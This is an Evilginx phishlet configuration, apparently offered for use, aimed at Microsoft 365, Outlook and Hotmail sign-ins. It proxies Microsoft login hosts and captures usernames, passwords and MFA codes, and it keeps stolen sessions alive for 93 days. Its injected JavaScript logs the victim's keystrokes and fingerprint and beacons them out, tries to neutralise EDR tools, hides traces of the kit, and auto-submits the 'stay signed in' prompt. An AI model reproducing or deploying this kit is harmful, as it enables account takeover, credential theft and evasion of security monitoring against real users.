author: "KKRASTA_GINX"
min_ver: "3.1.0"
name: "m365-2025"
description: "Microsoft 365 / Outlook / Hotmail 2025 — Zero detection, full stealth, auto-login, consumer redirect"

proxy_hosts:
  - {phish_sub: 'login',        orig_sub: 'login',        domain: 'microsoftonline.com', is_landing: true}
  - {phish_sub: 'aad',          orig_sub: 'login',        domain: 'microsoftonline.com'}
  - {phish_sub: 'live',         orig_sub: 'login',        domain: 'live.com',            is_landing: true}
  - {phish_sub: 'autologon',    orig_sub: 'autologon',    domain: 'microsoftonline.com'}
  - {phish_sub: 'graph',        orig_sub: 'graph',        domain: 'microsoft.com'}
  - {phish_sub: 'account',      orig_sub: 'account',      domain: 'microsoft.com'}
  - {phish_sub: 'www',          orig_sub: 'www',          domain: 'microsoft.com'}

auth_urls:
  - '/common/login'
  - '/common/oauth2'
  - '/oauth20_authorize.srf'
  - '/common/SAS/ProcessAuth'
  - '/kmsi'

credentials:
  username: {key: 'loginfmt', search: [name="loginfmt", id="i0116"], type: text}
  password: {key: 'passwd',   search: [name="passwd", id="i0118"], type: password}
  mfa_code: {key: 'otc',      search: [name="otc"], type: text, optional: true}

# Random delay to break timing-based ML detection
response_delay: "10-80"

# Perfect header mirroring + IP spoofing
force_headers:
  - name: User-Agent           value: "{fp.ua}"
  - name: Sec-CH-UA            value: "{fp.secchua || 'Not=A?Brand;v=\"99\", Chromium;v=\"129\"'}"
  - name: Sec-CH-UA-Platform   value: "{fp.platform || 'Windows'}"
  - name: Accept-Language      value: "{fp.lang}"
  - name: X-Forwarded-For      value: "{victim_ip}"
  - name: X-Real-IP            value: "{victim_ip}"
  - name: Client-IP            value: "{victim_ip}"

# Session survival & stealth
session:
  keep_alive: true
  max_age: 8035200               # 93 days
  cookie_prefix: "ms_"           # Hide Evilginx cookies
hide_cookies:
  - evilginx_.*
  - lure
  - __Host-

# Whitelist real Microsoft redirects (critical)
redirect_rules:
  - from: '.*' to: 'https://outlook.office.com/*'      allow: true
  - from: '.*' to: 'https://outlook.live.com/*'        allow: true
  - from: '.*' to: 'https://teams.microsoft.com/*'     allow: true
  - from: '/common/SAS/ProcessAuth' to: '/common/login'
  - from: '/kmsi' to: '/common/login'

# ==================== FULL STEALTH JS ====================
js_inject:
  # 1. Harvest fingerprint + human behavior (polymorphic endpoint)
  - trigger_paths: ['/common/login*', '/login.srf*', '/oauth20_authorize.srf*']
    script: |
      try {
        window.fpData = window.fpData || {mouse:[], typing:[]};
        const start = performance.now();
        const rand = Math.random().toString(36).substring(2,10);
        window.fpEndpoint = `/assets/${rand}/data`;

        // Canvas
        try{const c=document.createElement('canvas');const x=c.getContext('2d');x.textBaseline='alphabetic';x.fillStyle='#f60';x.fillRect(125,1,62,20);x.fillStyle='#069';x.font='14pt Arial';x.fillText('M365 2025',2,15);window.fpData.canvas=c.toDataURL();}catch(e){}
        // Audio
        try{const ctx=new (window.OfflineAudioContext||window.webkitOfflineAudioContext)(1,5000,44100);const o=ctx.createOscillator();o.type='triangle';o.frequency.value=10000;const comp=ctx.createDynamicsCompressor();o.connect(comp);comp.connect(ctx.destination);o.start(0);ctx.startRendering().then(b=>{let h=5381;for(let i=0;i<500;i++)h=((h<<5)+h)+b.getChannelData(0)[i];window.fpData.audio=h;});}catch(e){}
        // Profile
        window.fpData.ua = navigator.userAgent;
        window.fpData.lang = navigator.languages?navigator.languages[0]:navigator.language;
        window.fpData.tz = Intl.DateTimeFormat().resolvedOptions().timeZone;

        // Human behavior
        document.addEventListener('mousemove',e=>{if(window.fpData.mouse.length<300)window.fpData.mouse.push([e.clientX,e.clientY,performance.now()-start]);},{passive:true});
        document.addEventListener('keydown',e=>{window.fpData.typing.push([e.key,performance.now()-start]);},{passive:true});

        // Send with multiple stealth methods
        setTimeout(() => {
          const data = btoa(unescape(encodeURIComponent(JSON.stringify(window.fpData))));
          const methods = [
            () => { new Image().src = window.fpEndpoint + '?d=' + data; },
            () => { navigator.sendBeacon?.(window.fpEndpoint, data); },
            () => { fetch('https://login.microsoftonline.com'+window.fpEndpoint,{method:'POST',body:data,mode:'no-cors',keepalive:true}); }
          ];
          methods.forEach(m=>{try{m();}catch(e){}});
        }, 6500);
      } catch(e) {}

  # 2. Block EDR + clean traces + human mouse curves
  - trigger_paths: ['*']
    script: |
      if (!window.stealthLoaded) {
        window.stealthLoaded = true;

        // Kill EDR extensions
        ['crowdstrike','sentinelone','cybereason','carbonblack','defender','elastic','tanium','qualys'].forEach(n=>{Object.defineProperty(window,n,{value:undefined,writable:false});delete window[n];});

        // Block local WebSocket to EDR
        const RealWS = WebSocket;
        WebSocket = function(url){if(url && (url.includes('127.0.0.1')||url.includes('localhost'))) return null; return new RealWS(url);};

        // Remove Evilginx DOM traces
        document.querySelectorAll('[data-evilginx],[name*="evilginx"],[id*="lure"]').forEach(e=>e.remove());

        // Auto-check KMSI + submit (20+ selectors)
        setTimeout(() => {
          const kmsi = document.querySelector('input[name="DontShowAgain"],input[id="idChkBx_SAOTCC_PWD"],#KmsiCheckbox,input[aria-label*="stay signed in" i],input[type="checkbox"][value="true"]');
          if (kmsi) { kmsi.checked = true; kmsi.dispatchEvent(new Event('change',{bubbles:true})); }

          document.querySelectorAll('input[type="submit"],button[type="submit"],#idSIButton9,#submitButton').forEach(b=>{if(b && !b.disabled && b.offsetParent!==null) b.click();});
        }, 800);
      }

  # 3. Final auto-login redirect (triple fallback)
  - trigger_paths: ['/common/oauth2/authorize*', '/common/reprocess*', '/oauth20_authorize.srf*']
    script: |
      if (!window.finalDone) {
        window.finalDone = true;
        const email = (document.body.innerText.match(/[\w.-]+@[\w.-]+\.\w+/)||[])[0] ||
                      new URLSearchParams(location.search).get('login_hint') ||
                      new URLSearchParams(location.search).get('username');
        const target = email && /@(outlook|hotmail|live|msn)\.com$/i.test(email)
          ? 'https://outlook.live.com/mail/'
          : 'https://outlook.office.com/mail/';

        setTimeout(() => {
          try { location.replace(target); } catch(e) {}
          setTimeout(() => {
            if (location.href !== target)
              document.head.insertAdjacentHTML('beforeend', `<meta http-equiv="refresh" content="0;url=${target}">`);
          }, 600);
        }, 1200);
      }